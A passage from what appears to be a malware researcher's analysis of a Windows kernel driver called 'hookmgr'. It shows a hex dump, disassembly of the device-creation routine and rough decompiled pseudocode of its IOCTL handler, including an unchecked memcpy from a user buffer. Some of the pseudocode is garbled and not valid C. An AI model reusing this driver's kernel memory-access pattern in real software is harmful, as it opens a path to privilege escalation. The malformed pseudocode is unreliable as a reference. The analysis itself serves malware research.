  285. 00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
  286. 00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
  287. 00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
  288. 00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
  289. 00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
  290. 00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  291. 00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
  292. 00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
  293. 00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
  294. 00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
  295. 00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
  296. 00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
  297. 00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
  298. 00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
  299. 00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
  300. 00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
  301. 000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  302.  
  303. // The installation routine was reversed from the entry point: 0x001403e -> 0x0011310
  304. // it creates the hook manager device object for the driver
  305. |       |   0x0001403e      8bff           mov edi, edi
  306. |       |   0x00014040      55             push ebp
  307. |       |   0x00014041      8bec           mov ebp, esp
  308. |       |   0x00014043      e8bdffffff     call 0x14005
  309. |       |   0x00014048      5d             pop ebp
  310. \       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
  311.                   ↓ ↓ ↓ ↓ ↓
  312. |           0x00011310      8bff           mov edi, edi
  313. |           0x00011312      55             push ebp
  314. |           0x00011313      8bec           mov ebp, esp
  315. |           0x00011315      83ec0c         sub esp, 0xc
  316. |           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
  317. |           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
  318. |           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
  319. |           0x00011329      50             push eax        ;  source
  320. |           0x0001132a      6828300100     push 0x13028    ;  dest
  321. |           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  322. |           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
  323. |           0x00011338      51             push ecx       ; src
  324. |           0x00011339      6830300100     push 0x13030   ; dest
  325. |           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  326. |           0x00011344      6818300100     push 0x13018  ; Object Device (DeviceObject)
  327. |           0x00011349      6a00           push 0        ; excl bit
  328. |           0x0001134b      6a00           push 0        ; characteristic
  329. |           0x0001134d      6a15           push 0x15     ; type
  330. |           0x0001134f      6828300100     push 0x13028  ; name
  331. |           0x00011354      6a00           push 0        ; extension
  332. |           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  333. |           0x00011359      52             push edx      ; object
  334. |           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
  335. |           0x00011360      8945fc         mov dword [ebp-local_1], eax
  336. |           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
  337. |       ,=< 0x00011367      7c4a           jl 0x113b3
  338.  
  339. ////////////////////////////////
  340. symbolic link written & driver deletion on failure....
  341. ////////////////////////////////
  342. |       |   0x00011369      6828300100     push 0x13028
  343. |       |   0x0001136e      6830300100     push 0x13030
  344. |       |   0x00011373      ff151c200100   call dword [sym.imp.ntoskrnl.exe_IoCreateSymbolicLink] ; ".A" @ 0x1201c
  345. |       |   0x00011379      8945fc         mov dword [ebp-local_1], eax
  346. |       |   0x0001137c      837dfc00       cmp dword [ebp-local_1], 0
  347. |      ,==< 0x00011380      7c24           jl 0x113a6
  348. |      ||   0x00011382      8b4508         mov eax, dword [ebp+arg_2]  ; [0x8:4]=4
  349. |      ||   0x00011385      c74070701001.  mov dword [eax + 0x70], 0x11070 ; [0x11070:4]=0x8b55ff8b
  350. |      ||   0x0001138c      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  351. |      ||   0x0001138f      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  352. |      ||   0x00011392      8b4270         mov eax, dword [edx + 0x70] ; [0x70:4]=0x65646f6d  ; 'p' ; "mode....$" @ 0x70
  353. |      ||   0x00011395      894140         mov dword [ecx + 0x40], eax
  354. |      ||   0x00011398      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  355. |      ||   0x0001139b      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  356. |      ||   0x0001139e      8b4240         mov eax, dword [edx + 0x40] ; [0x40:4]=0xeba1f0e  ; '@'
  357. |      ||   0x000113a1      894138         mov dword [ecx + 0x38], eax
  358. |     ,===< 0x000113a4      eb0d           jmp 0x113b3
  359. |     |`--> 0x000113a6      8b0d18300100   mov ecx, dword [0x13018]    ; [0x13018:4]=0
  360. |     | |   0x000113ac      51             push ecx
  361. |     | |   0x000113ad      ff1518200100   call dword [sym.imp.ntoskrnl.exe_IoDeleteDevice] ; sym.imp.ntoskrnl.exe_IoDeleteDevice
  362. |     | |   ; JMP XREF from 0x000113a4 (fcn.00011310)
  363. |     `-`-> 0x000113b3      8b45fc         mov eax, dword [ebp-local_1]
  364. |           0x000113b6      8be5           mov esp, ebp
  365. |           0x000113b8      5d             pop ebp
  366. \           0x000113b9      c20800         ret 8
  367.  
  368. ///////////////////////////////////
  369. Driver switches for actions
  370. //////////////////////////////////
  371. fn.0x011070 ;;
  372. int ({eax}, int[var_loc], PIRP Irp)
  373. {
  374.   ULONG_PTR  [sp-0x010] [bp-254]
  375.   ULONG_PTR  [sp+0x22C] [bp-18]
  376.   ULONG_PTR  [sp+0x23C] [bp-8]
  377.  
  378.   char var0x01 = [sp+0x00C] [bp-0x0238]
  379.   char var0x02 = [sp+0x004] [bp-0x0240]
  380.   char var0x04 = [sp+0x22C] [bp-0x018h]
  381.  
  382.   var0x02 = *(_BYTE *)0x012B0(Irp);  
  383.   if ( var0x02 == 14 )
  384.   {
  385.     switch ( {*(_DWORD *)(v9 + 12);} )
  386.     {
  387. /////////////////////////
  388.       case 0x224004:
  389. ////////////////////////
  390.         if ( v8 < 0xC )
  391.         {
  392.           var0x01 = -0xERR;
  393.         }
  394.         else
  395.         {
  396.           {-2} = 0;
  397.           ProbeForWrite(*(PVOID *)&{Irp->AssociatedIrp.MasterIrp;}->Type, {Irp->AssociatedIrp.MasterIrp;}->Flags, 1u);
  398.           memcpy(*(void **)&v11->Type, v11->MdlAddress, v11->Flags);
  399.           var0x01 = 0;
  400.           {-2} = -2;
  401.         }
  402.         break;
  403.  
  404. ////////////////////////
  405.       case 0x22400C:
  406. ////////////////////////
  407.         if ( !DWORD-0x1301C )
  408.           DWORD-0x1301C = (int)sub_11010();
  409.         if ( DWORD-0x1301C )
  410.         {
  411.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x1301C;
  412.           Irp->IoStatus.Information = 4;
  413.           var0x01 = 0;
  414.         }
  415.         else
  416.         {
  417.           var0x01 = -0xERR;
  418.         }
  419.         break;
  420.  
  421. /////////////////////////
  422.       case 0x224014:
  423. ////////////////////////
  424.         if ( !DWORD-0x13020 )
  425.           DWORD-0x13020 = (int)sub_11040();
  426.         if ( DWORD-0x13020 )
  427.         {
  428.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x13020;
  429.           Irp->IoStatus.Information = 4;
  430.           var0x01 = 0;
  431.         }
  432.         else
  433.         {
  434.           var0x01 = -0xERR;
  435.         }
  436.         break;
  437.  
  438. ////////////////////
  439.       default:
  440. ////////////////////
  441.         var0x01 = -0xERR;
  442.         break;
  443.     }
  444.   }
  445. ///////////////
  446.   else
  447. //////////////
  448.   {
  449.     var0x01 = 0;
  450.   }
  451.   var0x01{Irp->IoStatus.Status}
  452.   IofCompleteRequest(Irp, 0);
  453.   return 0;
  454. }
  455.  
  456. An explanation of the switch-case above is on kernelmode.info, with help from FireFox:
  457. http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4217&p=27791#p27792
  458.  
  459. #  @unixfreaxjp | #MalwareMustDie